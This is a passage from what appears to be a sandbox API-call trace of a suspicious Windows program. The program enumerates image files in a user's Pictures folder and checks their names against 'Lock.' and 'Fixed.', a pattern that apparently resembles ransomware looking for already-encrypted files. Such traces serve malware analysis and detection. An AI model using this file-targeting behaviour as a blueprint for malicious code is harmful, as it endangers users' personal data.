ftLastAccessTime.dwLowDateTime=0xfda7ffb0, ftLastAccessTime.dwHighDateTime=0x1d4c996, ftLastWriteTime.dwLowDateTime=0xfda7ffb0, ftLastWriteTime.dwHighDateTime=0x1d4c996, nFileSizeHigh=0x0, nFileSizeLow=0x94b9, dwReserved0=0x1644, dwReserved1=0x4, cFileName="krvo L5sveZ W.png", cAlternateFileName="KRVOL5~1.PNG")) returned 0 [0256.224] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.224] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0256.225] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.225] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0256.227] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/krvo L5sveZ W.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png", lpFilePart=0x8bf658*="krvo L5sveZ W.png") returned 0x39 [0256.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0256.227] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\krvo l5svez w.png")) returned 0xffffffff [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.228] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.228] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.228] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QrlF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rlF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.229] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QrlF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rlF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.230] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.230] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.230] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.230] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0256.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.231] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/QrlF.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf040940, ftCreationTime.dwHighDateTime=0x1d4c68e, ftLastAccessTime.dwLowDateTime=0xe93e2810, ftLastAccessTime.dwHighDateTime=0x1d4d021, ftLastWriteTime.dwLowDateTime=0xe93e2810, ftLastWriteTime.dwHighDateTime=0x1d4d021, nFileSizeHigh=0x0, nFileSizeLow=0x18374, dwReserved0=0x9fe0047, dwReserved1=0x1f06a, cFileName="QrlF.gif", cAlternateFileName="")) returned 0xaa5820 [0256.232] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.232] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.234] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.234] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.235] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) 